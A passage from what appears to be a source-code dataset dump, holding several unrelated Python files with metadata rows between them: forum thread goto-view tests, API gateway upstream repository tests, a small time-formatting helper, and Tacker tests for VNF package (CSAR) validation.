GOTO_PAGE_URL % (self.thread.get_absolute_url(), 2, post.pk),
)
@override_dynamic_settings(
posts_per_page=POSTS_PER_PAGE, posts_per_page_orphans=POSTS_PER_PAGE_ORPHANS
)
def test_goto_first_new_post_in_read_thread(self):
"""goto new in read thread points to last post"""
save_read(self.user, self.thread.first_post)
for _ in range(POSTS_PER_PAGE + POSTS_PER_PAGE_ORPHANS):
post = test.reply_thread(self.thread, posted_on=timezone.now())
save_read(self.user, post)
response = self.client.get(self.thread.get_new_post_url())
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["location"],
GOTO_PAGE_URL % (self.thread.get_absolute_url(), 2, post.pk),
)
@override_dynamic_settings(
posts_per_page=POSTS_PER_PAGE, posts_per_page_orphans=POSTS_PER_PAGE_ORPHANS
)
def test_guest_goto_first_new_post_in_thread(self):
"""guest goto new in read thread points to last post"""
for _ in range(POSTS_PER_PAGE + POSTS_PER_PAGE_ORPHANS):
post = test.reply_thread(self.thread, posted_on=timezone.now())
self.logout_user()
response = self.client.get(self.thread.get_new_post_url())
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["location"],
GOTO_PAGE_URL % (self.thread.get_absolute_url(), 2, post.pk),
)
class GotoBestAnswerTests(GotoViewTestCase):
def test_view_handles_no_best_answer(self):
"""if thread has no best answer, redirect to first post"""
response = self.client.get(self.thread.get_best_answer_url())
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["location"],
GOTO_URL % (self.thread.get_absolute_url(), self.thread.first_post_id),
)
@override_dynamic_settings(
posts_per_page=POSTS_PER_PAGE, posts_per_page_orphans=POSTS_PER_PAGE_ORPHANS
)
def test_view_handles_best_answer(self):
"""if thread has best answer, redirect to it"""
for _ in range(POSTS_PER_PAGE + POSTS_PER_PAGE_ORPHANS):
test.reply_thread(self.thread, posted_on=timezone.now())
best_answer = test.reply_thread(self.thread, posted_on=timezone.now())
self.thread.set_best_answer(self.user, best_answer)
self.thread.save()
for _ in range(POSTS_PER_PAGE + POSTS_PER_PAGE_ORPHANS - 1):
test.reply_thread(self.thread, posted_on=timezone.now())
response = self.client.get(self.thread.get_best_answer_url())
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["location"],
GOTO_PAGE_URL % (self.thread.get_absolute_url(), 2, best_answer.pk),
)
class GotoUnapprovedTests(GotoViewTestCase):
def test_view_validates_permission(self):
"""view validates permission to see unapproved posts"""
response = self.client.get(self.thread.get_unapproved_post_url())
self.assertContains(
response, "You need permission to approve content", status_code=403
)
with patch_category_acl({"can_approve_content": True}):
response = self.client.get(self.thread.get_unapproved_post_url())
self.assertEqual(response.status_code, 302)
@patch_category_acl({"can_approve_content": True})
def test_view_handles_no_unapproved_posts(self):
"""if thread has no unapproved posts, redirect to last post"""
response = self.client.get(self.thread.get_unapproved_post_url())
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["location"],
GOTO_URL % (self.thread.get_absolute_url(), self.thread.first_post_id),
)
@override_dynamic_settings(
posts_per_page=POSTS_PER_PAGE, posts_per_page_orphans=POSTS_PER_PAGE_ORPHANS
)
@patch_category_acl({"can_approve_content": True})
def test_view_handles_unapproved_posts(self):
"""if thread has unapproved posts, redirect to first of them"""
for _ in range(POSTS_PER_PAGE + POSTS_PER_PAGE_ORPHANS):
test.reply_thread(self.thread, posted_on=timezone.now())
post = test.reply_thread(
self.thread, is_unapproved=True, posted_on=timezone.now()
)
for _ in range(POSTS_PER_PAGE + POSTS_PER_PAGE_ORPHANS - 1):
test.reply_thread(self.thread, posted_on=timezone.now())
response = self.client.get(self.thread.get_unapproved_post_url())
self.assertEqual(response.status_code, 302)
self.assertEqual(
response["location"],
GOTO_PAGE_URL % (self.thread.get_absolute_url(), 2, post.pk),
)
class ThreadGotoPostTests(GotoViewTestCase):
"""brureforcing regression tests for regression test for #869"""
def test_thread_growing_post_goto(self):
"""growing thread goto views don't fail"""
for _ in range(60):
post = test.reply_thread(self.thread, posted_on=timezone.now())
# go to post link is valid
post_url = self.client.get(post.get_absolute_url())["location"]
response = self.client.get(post_url)
self.assertContains(response, post.get_absolute_url())
# go to last post link is valid
last_url = self.client.get(self.thread.get_last_post_url())["location"]
self.assertEqual(post_url, last_url)
def test_thread_growing_event_goto(self):
"""growing thread goto views don't fail for events"""
for i in range(60):
test.reply_thread(self.thread, posted_on=timezone.now())
post = test.reply_thread(self.thread, posted_on=timezone.now())
post.is_event = True
post.save()
# go to post link is valid
post_url = self.client.get(post.get_absolute_url())["location"]
if i == 0:
# manually set events flag after first event was created
self.thread.has_events = True
self.thread.save()
response = self.client.get(post_url)
self.assertContains(response, post.get_absolute_url())
# go to last post link is valid
last_url = self.client.get(self.thread.get_last_post_url())["location"]
self.assertEqual(post_url, last_url)
def test_thread_post_goto(self):
"""thread goto views don't fail"""
for _ in range(60):
test.reply_thread(self.thread, posted_on=timezone.now())
for post in self.thread.post_set.order_by("id").iterator():
# go to post link is valid
post_url = self.client.get(post.get_absolute_url())["location"]
response = self.client.get(post_url)
self.assertContains(response, post.get_absolute_url())
# go to last post link is valid
last_url = self.client.get(self.thread.get_last_post_url())["location"]
self.assertEqual(post_url, last_url)
def test_thread_event_goto(self):
"""thread goto views don't fail for events"""
for _ in range(60):
test.reply_thread(self.thread, posted_on=timezone.now())
post = test.reply_thread(self.thread, posted_on=timezone.now())
post.is_event = True
post.save()
for post in (
self.thread.post_set.filter(is_event=True).order_by("id").iterator()
):
# go to post link is valid
post_url = self.client.get(post.get_absolute_url())["location"]
response = self.client.get(post_url)
self.assertContains(response, post.get_absolute_url())
# go to last post link is valid
last_url = self.client.get(self.thread.get_last_post_url())["location"]
self.assertEqual(post_url, last_url)
| 39.287154 | 86 | 0.664359 | 2,017 | 15,597 | 4.83292 | 0.066931 | 0.081042 | 0.091096 | 0.068219 | 0.876487 | 0.867973 | 0.852483 | 0.83771 | 0.820989 | 0.799549 | 0 | 0.007509 | 0.231583 | 15,597 | 396 | 87 | 39.386364 | 0.805841 | 0.082324 | 0 | 0.680702 | 0 | 0 | 0.027054 | 0 | 0 | 0 | 0 | 0 | 0.17193 | 1 | 0.077193 | false | 0 | 0.024561 | 0 | 0.126316 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d9c24bda6eb3ab4a39db281be5bdf1ecfd85193c | 43 | py | Python | openselfsup/models/backbones/__init__.py | youqingxiaozhua/OpenSelfSup | 7e94af11d8bec67cace70fb881e45228224fe14d | [
"Apache-2.0"
] | 1,624 | 2020-06-16T04:03:15.000Z | 2021-12-16T03:42:24.000Z | openselfsup/models/backbones/__init__.py | changlin31/OpenSelfSup | ab8fc27c6b43679317eaf312b85461ba490606af | [
"Apache-2.0"
] | 91 | 2020-06-16T13:57:20.000Z | 2021-12-06T09:24:03.000Z | openselfsup/models/backbones/__init__.py | changlin31/OpenSelfSup | ab8fc27c6b43679317eaf312b85461ba490606af | [
"Apache-2.0"
] | 235 | 2020-06-16T05:45:52.000Z | 2021-12-15T02:43:21.000Z | from .resnet import ResNet, make_res_layer
| 21.5 | 42 | 0.837209 | 7 | 43 | 4.857143 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.116279 | 43 | 1 | 43 | 43 | 0.894737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d9e6c5ea9e3ed68e26cd246667b37c630acbce2d | 300 | py | Python | sklearnbot/utils/misc.py | hp2500/sklearn-bot | 4a84ae7d58a54b90802978782ea7a33a05031de2 | [
"BSD-3-Clause"
] | null | null | null | sklearnbot/utils/misc.py | hp2500/sklearn-bot | 4a84ae7d58a54b90802978782ea7a33a05031de2 | [
"BSD-3-Clause"
] | null | null | null | sklearnbot/utils/misc.py | hp2500/sklearn-bot | 4a84ae7d58a54b90802978782ea7a33a05031de2 | [
"BSD-3-Clause"
] | null | null | null | from time import gmtime, strftime
def get_time():
"""
Returns a string representing the time, to be used in string output to the
stdout and stderr
Returns
-------
time: str
A string representing the time
"""
return strftime("[%Y-%m-%d %H:%M:%S]", gmtime())
| 20 | 78 | 0.6 | 42 | 300 | 4.261905 | 0.642857 | 0.078212 | 0.212291 | 0.24581 | 0.290503 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.273333 | 300 | 14 | 79 | 21.428571 | 0.821101 | 0.513333 | 0 | 0 | 0 | 0 | 0.172727 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8a13af17632468096ed35d2e2d2874ce2796756a | 1,169 | py | Python | tests/test_upstream_repository.py | sunwei/ddd-api-gateway | 438c1bdcf7f10d383cf9d7c596c39bf88b8756cd | [
"MIT"
] | null | null | null | tests/test_upstream_repository.py | sunwei/ddd-api-gateway | 438c1bdcf7f10d383cf9d7c596c39bf88b8756cd | [
"MIT"
] | null | null | null | tests/test_upstream_repository.py | sunwei/ddd-api-gateway | 438c1bdcf7f10d383cf9d7c596c39bf88b8756cd | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Test ApiGW"""
import pytest
from ddd_api_gateway.apigw_factory import create_api_gw
from ddd_api_gateway.upstream_repository import UpstreamRepository
@pytest.mark.usefixtures("api_gw_json_data")
def test_find_upstream_by_id(api_gw_json_data):
api_gw_instance = create_api_gw("json", data=api_gw_json_data)
repository = UpstreamRepository(upstreams=api_gw_instance.upstreams)
first_upstream = repository.upstreams[0]
assert repository.find(first_upstream.id) is first_upstream
@pytest.mark.usefixtures("api_gw_json_data")
def test_find_upstream_by_name(api_gw_json_data):
api_gw_instance = create_api_gw("json", data=api_gw_json_data)
repository = UpstreamRepository(upstreams=api_gw_instance.upstreams)
first_upstream = repository.upstreams[0]
assert repository.find_by_name(first_upstream.name) is first_upstream
@pytest.mark.usefixtures("api_gw_json_data")
def test_find_all_upstreams(api_gw_json_data):
api_gw_instance = create_api_gw("json", data=api_gw_json_data)
repository = UpstreamRepository(upstreams=api_gw_instance.upstreams)
assert repository.find_all() is repository.upstreams
| 40.310345 | 73 | 0.813516 | 169 | 1,169 | 5.195266 | 0.195266 | 0.1082 | 0.123007 | 0.177677 | 0.731207 | 0.731207 | 0.731207 | 0.731207 | 0.731207 | 0.731207 | 0 | 0.002846 | 0.098375 | 1,169 | 28 | 74 | 41.75 | 0.830171 | 0.028229 | 0 | 0.55 | 0 | 0 | 0.053097 | 0 | 0 | 0 | 0 | 0 | 0.15 | 1 | 0.15 | false | 0 | 0.15 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8a18f4c0169b7e8663c75671f3e4b63eb6a1e3cd | 23,878 | py | Python | tacker/tests/unit/common/test_csar_utils.py | SSU-DCN/tacker | d886ac7fec3d9cf6e0cefc5d2fa89a733a5255ae | [
"Apache-2.0"
] | null | null | null | tacker/tests/unit/common/test_csar_utils.py | SSU-DCN/tacker | d886ac7fec3d9cf6e0cefc5d2fa89a733a5255ae | [
"Apache-2.0"
] | null | null | null | tacker/tests/unit/common/test_csar_utils.py | SSU-DCN/tacker | d886ac7fec3d9cf6e0cefc5d2fa89a733a5255ae | [
"Apache-2.0"
] | 1 | 2020-11-16T02:14:35.000Z | 2020-11-16T02:14:35.000Z | # Copyright (c) 2019 NTT DATA.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import shutil
import tempfile
import testtools
from unittest import mock
import uuid
import zipfile
from tacker.common import csar_utils
from tacker.common import exceptions
from tacker import context
from tacker.tests import constants
from tacker.tests import utils
class TestCSARUtils(testtools.TestCase):
def setUp(self):
super(TestCSARUtils, self).setUp()
self.context = context.get_admin_context()
def _get_csar_file_path(self, file_name):
return os.path.join("./tacker/tests/etc/samples", file_name)
@mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
def test_load_csar_data(self, mock_extract_csar_zip_file):
file_path, _ = utils.create_csar_with_unique_vnfd_id(
'./tacker/tests/etc/samples/etsi/nfv/'
'sample_vnfpkg_tosca_vnfd')
self.addCleanup(os.remove, file_path)
vnf_data, flavours, vnf_artifacts = csar_utils.load_csar_data(
self.context, constants.UUID, file_path)
self.assertEqual(vnf_data['descriptor_version'], '1.0')
self.assertEqual(vnf_data['vnfm_info'], ['Tacker'])
self.assertEqual(flavours[0]['flavour_id'], 'simple')
self.assertIsNotNone(flavours[0]['sw_images'])
@mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
def test_load_csar_data_with_single_yaml(
self, mock_extract_csar_zip_file):
file_path, _ = utils.create_csar_with_unique_vnfd_id(
'./tacker/tests/etc/samples/etsi/nfv/'
'sample_vnfpkg_no_meta_single_vnfd')
self.addCleanup(os.remove, file_path)
vnf_data, flavours, vnf_artifacts = csar_utils.load_csar_data(
self.context, constants.UUID, file_path)
self.assertEqual(vnf_data['descriptor_version'], '1.0')
self.assertEqual(vnf_data['vnfm_info'], ['Tacker'])
self.assertEqual(flavours[0]['flavour_id'], 'simple')
self.assertIsNotNone(flavours[0]['sw_images'])
def _get_csar_zip_from_dir(self, dir_name):
csar_dir_path = os.path.join('test_csar_utils_data', dir_name)
unique_name = str(uuid.uuid4())
csar_temp_dir = os.path.join('/tmp', unique_name)
self.addCleanup(shutil.rmtree, csar_temp_dir)
utils.copy_csar_files(csar_temp_dir, csar_dir_path)
# Copy contents from 'test_csar_utils_common' to 'csar_temp_dir'.
common_dir_path = ('./tacker/tests/etc/samples/etsi/nfv/'
'test_csar_utils_data/test_csar_utils_common')
common_yaml_file = os.path.join(common_dir_path,
'Definitions/helloworld3_types.yaml')
shutil.copy(common_yaml_file,
os.path.join(csar_temp_dir, 'Definitions/'))
shutil.copytree(os.path.join(common_dir_path, "TOSCA-Metadata/"),
os.path.join(csar_temp_dir, "TOSCA-Metadata/"))
# Create temporary zip file from 'csar_temp_dir'
tempfd, tempname = tempfile.mkstemp(suffix=".zip", dir=csar_temp_dir)
os.close(tempfd)
zcsar = zipfile.ZipFile(tempname, 'w')
for (dpath, _, fnames) in os.walk(csar_temp_dir):
for fname in fnames:
src_file = os.path.join(dpath, fname)
dst_file = os.path.relpath(os.path.join(dpath, fname),
csar_temp_dir)
zcsar.write(src_file, dst_file)
zcsar.close()
return tempname
@mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
def test_load_csar_data_in_meta_and_manifest_with_vnf_artifact(
self, mock_extract_csar_zip_file):
file_path = utils.create_csar_with_unique_artifact(
'./tacker/tests/etc/samples/etsi/nfv/'
'sample_vnf_package_csar_in_meta_and_manifest')
self.addCleanup(os.remove, file_path)
vnf_data, flavours, vnf_artifacts = csar_utils.load_csar_data(
self.context, constants.UUID, file_path)
self.assertEqual(vnf_data['descriptor_version'], '1.0')
self.assertEqual(vnf_data['vnfm_info'], ['Tacker'])
self.assertEqual(flavours[0]['flavour_id'], 'simple')
self.assertIsNotNone(flavours[0]['sw_images'])
self.assertIsNotNone(vnf_artifacts)
self.assertIsNotNone(vnf_artifacts[0]['Source'])
self.assertIsNotNone(vnf_artifacts[0]['Hash'])
for item in vnf_artifacts:
flag = item.get('Source').lower().endswith('.img')
self.assertEqual(flag, False)
@mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
def test_load_csar_data_with_single_manifest_with_vnf_artifact(
self, mock_extract_csar_zip_file):
file_path = utils.create_csar_with_unique_artifact(
'./tacker/tests/etc/samples/etsi/nfv/'
'sample_vnf_package_csar_manifest')
self.addCleanup(os.remove, file_path)
vnf_data, flavours, vnf_artifacts = csar_utils.load_csar_data(
self.context, constants.UUID, file_path)
self.assertEqual(vnf_data['descriptor_version'], '1.0')
self.assertEqual(vnf_data['vnfm_info'], ['Tacker'])
self.assertEqual(flavours[0]['flavour_id'], 'simple')
self.assertIsNotNone(flavours[0]['sw_images'])
self.assertIsNotNone(vnf_artifacts)
self.assertIsNotNone(vnf_artifacts[0]['Source'])
self.assertIsNotNone(vnf_artifacts[0]['Hash'])
@mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
def test_load_csar_data_with_single_meta_with_vnf_artifact(
self, mock_extract_csar_zip_file):
file_path = utils.create_csar_with_unique_artifact(
'./tacker/tests/etc/samples/etsi/nfv/'
'sample_vnf_package_csar_meta')
self.addCleanup(os.remove, file_path)
vnf_data, flavours, vnf_artifacts = csar_utils.load_csar_data(
self.context, constants.UUID, file_path)
self.assertEqual(vnf_data['descriptor_version'], '1.0')
self.assertEqual(vnf_data['vnfm_info'], ['Tacker'])
self.assertEqual(flavours[0]['flavour_id'], 'simple')
self.assertIsNotNone(flavours[0]['sw_images'])
self.assertIsNotNone(vnf_artifacts)
self.assertIsNotNone(vnf_artifacts[0]['Source'])
self.assertIsNotNone(vnf_artifacts[0]['Hash'])
@mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
def test_load_csar_data_meta_in_manifest_with_vnf_artifact(
self, mock_extract_csar_zip_file):
file_path = utils.create_csar_with_unique_artifact(
'./tacker/tests/etc/samples/etsi/nfv/'
'sample_vnf_package_csar_meta_in_manifest')
self.addCleanup(os.remove, file_path)
vnf_data, flavours, vnf_artifacts = csar_utils.load_csar_data(
self.context, constants.UUID, file_path)
self.assertEqual(vnf_data['descriptor_version'], '1.0')
self.assertEqual(vnf_data['vnfm_info'], ['Tacker'])
self.assertEqual(flavours[0]['flavour_id'], 'simple')
self.assertIsNotNone(flavours[0]['sw_images'])
self.assertIsNotNone(vnf_artifacts)
self.assertIsNotNone(vnf_artifacts[0]['Source'])
self.assertIsNotNone(vnf_artifacts[0]['Hash'])
@mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
def test_load_csar_data_false_mf_with_vnf_artifact(
self, mock_extract_csar_zip_file):
file_path = utils.create_csar_with_unique_artifact(
'./tacker/tests/etc/samples/etsi/nfv/'
'sample_vnf_package_csar_in_meta_and_manifest_false')
self.addCleanup(os.remove, file_path)
manifest_path = 'manifest.mf1'
exc = self.assertRaises(exceptions.InvalidCSAR,
csar_utils.load_csar_data,
self.context, constants.UUID, file_path)
msg = (('The file "%(manifest)s" in the CSAR "%(csar)s" does not '
'contain valid manifest.') %
{'manifest': manifest_path, 'csar': file_path})
self.assertEqual(msg, exc.format_message())
@mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
def test_load_csar_data_false_mf_name_with_vnf_artifact(
self, mock_extract_csar_zip_file):
file_path = utils.create_csar_with_unique_artifact(
'./tacker/tests/etc/samples/etsi/nfv/'
'sample_vnf_package_csar_in_single_manifest_false_name')
self.addCleanup(os.remove, file_path)
manifest_path = 'VNF1.mf'
exc = self.assertRaises(exceptions.InvalidCSAR,
csar_utils.load_csar_data,
self.context, constants.UUID, file_path)
msg = (('The filename "%(manifest)s" is an invalid name.'
'The name must be the same as the main template '
'file name.') %
{'manifest': manifest_path, 'csar': file_path})
self.assertEqual(msg, exc.format_message())
@mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
def test_load_csar_data_false_hash_with_vnf_artifact(
self, mock_extract_csar_zip_file):
file_path = utils.create_csar_with_unique_artifact(
'./tacker/tests/etc/samples/etsi/nfv/'
'sample_vnf_package_csar_in_meta_and_manifest_false_hash')
self.addCleanup(os.remove, file_path)
exc = self.assertRaises(exceptions.InvalidCSAR,
csar_utils.load_csar_data,
self.context, constants.UUID, file_path)
hash_code = '27bbdb25d8f4ed6d07d6f6581b86515e8b2f' \
'0059b236ef7b6f50d6674b34f02'
artifact_path = 'Scripts/install.sh'
msg = (('The hash "%(hash)s" of artifact file '
'"%(artifact)s" is an invalid value.') %
{'hash': hash_code, 'artifact': artifact_path})
self.assertEqual(msg, exc.format_message())
@mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
def test_load_csar_data_missing_key_with_vnf_artifact(
self, mock_extract_csar_zip_file):
file_path = utils.create_csar_with_unique_artifact(
'./tacker/tests/etc/samples/etsi/nfv/'
'sample_vnf_package_csar_in_meta_and_manifest_missing_key')
self.addCleanup(os.remove, file_path)
exc = self.assertRaises(exceptions.InvalidCSAR,
csar_utils.load_csar_data,
self.context, constants.UUID, file_path)
key_name = sorted(['Algorithm'])
msg = (('One of the artifact information may not have '
'the key("%(key)s")') % {'key': key_name})
self.assertEqual(msg, exc.format_message())
@mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
def test_load_csar_data_missing_value_with_vnf_artifact(
self, mock_extract_csar_zip_file):
file_path = utils.create_csar_with_unique_artifact(
'./tacker/tests/etc/samples/etsi/nfv/'
'sample_vnf_package_csar_in_meta_and_manifest_missing_value')
self.addCleanup(os.remove, file_path)
exc = self.assertRaises(exceptions.InvalidCSAR,
csar_utils.load_csar_data,
self.context, constants.UUID, file_path)
key_name = 'Algorithm'
msg = (('One of the artifact information may not have '
'the key value("%(key)s")') % {'key': key_name})
self.assertEqual(msg, exc.format_message())
@mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
def test_load_csar_data_false_source_with_vnf_artifact(
self, mock_extract_csar_zip_file):
file_path = utils.create_csar_with_unique_artifact(
'./tacker/tests/etc/samples/etsi/nfv/'
'sample_vnf_package_csar_in_meta_and_manifest_false_source')
self.addCleanup(os.remove, file_path)
exc = self.assertRaises(exceptions.InvalidCSAR,
csar_utils.load_csar_data,
self.context, constants.UUID, file_path)
artifact_path = 'Scripts/install.s'
msg = (('The path("%(artifact_path)s") of '
'artifact Source is an invalid value.') %
{'artifact_path': artifact_path})
self.assertEqual(msg, exc.format_message())
@mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
def test_load_csar_data_false_algorithm_with_vnf_artifact(
self, mock_extract_csar_zip_file):
file_path = utils.create_csar_with_unique_artifact(
'./tacker/tests/etc/samples/etsi/nfv/'
'sample_vnf_package_csar_in_meta_and_manifest_false_algorithm')
self.addCleanup(os.remove, file_path)
exc = self.assertRaises(exceptions.InvalidCSAR,
csar_utils.load_csar_data,
self.context, constants.UUID, file_path)
algorithm = 'sha-255'
artifact_path = 'Scripts/install.sh'
msg = (('The algorithm("%(algorithm)s") of '
'artifact("%(artifact_path)s") is '
'an invalid value.') %
{'algorithm': algorithm,
'artifact_path': artifact_path})
self.assertEqual(msg, exc.format_message())
@mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
def test_load_csar_data_without_instantiation_level(
self, mock_extract_csar_zip_file):
file_path = self._get_csar_zip_from_dir(
'csar_without_instantiation_level')
exc = self.assertRaises(exceptions.InvalidCSAR,
csar_utils.load_csar_data,
self.context, constants.UUID, file_path)
msg = ('Policy of type'
' "tosca.policies.nfv.InstantiationLevels is not defined.')
self.assertEqual(msg, exc.format_message())
@mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
def test_load_csar_data_with_invalid_instantiation_level(
self, mock_extract_csar_zip_file):
file_path = self._get_csar_zip_from_dir(
'csar_invalid_instantiation_level')
exc = self.assertRaises(exceptions.InvalidCSAR,
csar_utils.load_csar_data,
self.context, constants.UUID, file_path)
levels = ['instantiation_level_1', 'instantiation_level_2']
msg = ("Level(s) instantiation_level_3 not found in "
"defined levels %s") % ",".join(sorted(levels))
self.assertEqual(msg, exc.format_message())
@mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
def test_load_csar_data_with_invalid_default_instantiation_level(
self, mock_extract_csar_zip_file):
file_path = self._get_csar_zip_from_dir(
'csar_with_invalid_default_instantiation_level')
exc = self.assertRaises(exceptions.InvalidCSAR,
csar_utils.load_csar_data,
self.context, constants.UUID, file_path)
levels = ['instantiation_level_1', 'instantiation_level_2']
msg = ("Level instantiation_level_3 not found in "
"defined levels %s") % ",".join(sorted(levels))
self.assertEqual(msg, exc.format_message())
@mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
def test_load_csar_data_without_vnfd_info(
self, mock_extract_csar_zip_file):
file_path = self._get_csar_zip_from_dir(
'csar_without_vnfd_info')
exc = self.assertRaises(exceptions.InvalidCSAR,
csar_utils.load_csar_data,
self.context, constants.UUID, file_path)
self.assertEqual("VNF properties are mandatory", exc.format_message())
@mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
def test_load_csar_data_with_artifacts_and_without_sw_image_data(
self, mock_extract_csar_zip_file):
file_path = self._get_csar_zip_from_dir(
'csar_without_sw_image_data')
exc = self.assertRaises(exceptions.InvalidCSAR,
csar_utils.load_csar_data,
self.context, constants.UUID, file_path)
msg = ('Node property "sw_image_data" is missing for '
'artifact sw_image for node VDU1.')
self.assertEqual(msg, exc.format_message())
@mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
def test_load_csar_data_with_multiple_sw_image_data(
self, mock_extract_csar_zip_file):
file_path = self._get_csar_zip_from_dir(
'csar_with_multiple_sw_image_data')
exc = self.assertRaises(exceptions.InvalidCSAR,
csar_utils.load_csar_data,
self.context, constants.UUID, file_path)
msg = ('artifacts of type "tosca.artifacts.nfv.SwImage"'
' is added more than one time for node VDU1.')
self.assertEqual(msg, exc.format_message())
@mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
def test_csar_with_missing_sw_image_data_in_main_template(
self, mock_extract_csar_zip_file):
file_path = self._get_csar_zip_from_dir(
'csar_with_missing_sw_image_data_in_main_template')
exc = self.assertRaises(exceptions.InvalidCSAR,
csar_utils.load_csar_data,
self.context, constants.UUID, file_path)
msg = ('Node property "sw_image_data" is missing for'
' artifact sw_image for node VDU1.')
self.assertEqual(msg, exc.format_message())
@mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
def test_load_csar_data_without_flavour_info(
self, mock_extract_csar_zip_file):
file_path = self._get_csar_zip_from_dir('csar_without_flavour_info')
exc = self.assertRaises(exceptions.InvalidCSAR,
csar_utils.load_csar_data,
self.context, constants.UUID, file_path)
self.assertEqual("No VNF flavours are available", exc.format_message())
@mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
def test_load_csar_data_without_flavour_info_in_main_template(
self, mock_extract_csar_zip_file):
file_path = self._get_csar_zip_from_dir(
'csar_without_flavour_info_in_main_template')
exc = self.assertRaises(exceptions.InvalidCSAR,
csar_utils.load_csar_data,
self.context, constants.UUID, file_path)
self.assertEqual("No VNF flavours are available",
exc.format_message())
@mock.patch.object(os, 'remove')
@mock.patch.object(shutil, 'rmtree')
def test_delete_csar_data(self, mock_rmtree, mock_remove):
csar_utils.delete_csar_data(constants.UUID)
mock_rmtree.assert_called()
mock_remove.assert_called()
@mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
def test_load_csar_data_without_policies(
self, mock_extract_csar_zip_file):
file_path = self._get_csar_zip_from_dir(
'csar_without_policies')
vnf_data, flavours, vnf_artifacts = csar_utils.load_csar_data(
self.context, constants.UUID, file_path)
self.assertIsNone(flavours[0].get('instantiation_levels'))
self.assertEqual(vnf_data['descriptor_version'], '1.0')
@mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
def test_load_csar_with_artifacts_short_notation_without_sw_image_data(
self, mock_extract_csar_zip_file):
file_path = "./tacker/tests/etc/samples/etsi/nfv/" \
"csar_short_notation_for_artifacts_without_sw_image_data"
zip_name, uniqueid = utils.create_csar_with_unique_vnfd_id(file_path)
exc = self.assertRaises(exceptions.InvalidCSAR,
csar_utils.load_csar_data,
self.context, constants.UUID, zip_name)
msg = ('Node property "sw_image_data" is missing for'
' artifact sw_image for node VDU1.')
self.assertEqual(msg, exc.format_message())
os.remove(zip_name)
@mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
def test_load_csar_data_with_artifacts_short_notation(
self, mock_extract_csar_zip_file):
file_path = "./tacker/tests/etc/samples/etsi/nfv/" \
"csar_with_short_notation_for_artifacts"
zip_name, uniqueid = utils.create_csar_with_unique_vnfd_id(file_path)
vnf_data, flavours, vnf_artifacts = csar_utils.load_csar_data(
self.context, constants.UUID, zip_name)
self.assertEqual(vnf_data['descriptor_version'], '1.0')
self.assertEqual(vnf_data['vnfm_info'], ['Tacker'])
self.assertEqual(flavours[0]['flavour_id'], 'simple')
self.assertIsNotNone(flavours[0]['sw_images'])
os.remove(zip_name)
@mock.patch('tacker.common.csar_utils.extract_csar_zip_file')
def test_load_csar_data_with_multiple_sw_image_data_with_short_notation(
self, mock_extract_csar_zip_file):
file_path = "./tacker/tests/etc/samples/etsi/nfv/" \
"csar_multiple_sw_image_data_with_short_notation"
